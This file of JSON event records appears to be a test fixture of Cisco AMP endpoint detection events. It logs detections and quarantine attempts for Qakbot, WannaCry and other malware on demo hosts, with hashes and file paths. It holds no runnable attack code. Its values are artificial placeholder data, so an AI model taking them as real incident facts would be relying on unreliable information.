Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. 
It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
